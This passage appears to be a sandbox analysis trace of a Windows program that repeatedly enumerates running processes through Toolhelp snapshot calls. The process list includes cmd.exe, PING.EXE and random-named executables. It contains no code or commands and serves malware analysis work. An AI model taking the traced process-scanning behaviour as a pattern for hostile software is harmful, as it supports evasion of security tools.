dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.836] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, 
th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.837] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0102.839] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0102.840] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0102.841] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0102.842] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0102.843] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0102.845] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0102.846] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0102.847] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0102.848] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0102.849] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0102.850] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0102.852] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0102.853] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0102.854] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0102.855] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0102.856] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0102.857] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0102.858] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0102.859] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0102.860] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.861] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0102.862] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.863] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.864] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb74, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.865] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.866] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.867] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.868] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xb88, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0102.913] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0102.915] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0102.916] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbe8, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0102.917] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0102.919] CloseHandle (hObject=0xbc) returned 1 [0102.919] Sleep (dwMilliseconds=0x12c) [0103.281] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0103.286] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.287] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0103.287] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0103.288] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.289] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0103.289] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.290] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0103.291] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, 
th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0103.291] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0103.292] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0103.293] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.293] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.294] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.294] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.295] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.296] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0103.296] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.297] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.298] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0103.299] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.300] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.301] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, 
th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0103.302] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0103.303] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0103.305] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.306] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.307] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0103.308] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0103.309] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0103.310] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0103.311] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0103.313] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0103.314] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0103.375] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0103.376] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0103.378] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0103.379] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0103.381] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0103.382] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0103.383] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0103.385] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0103.386] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0103.388] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0103.389] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0103.390] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0103.392] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0103.393] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 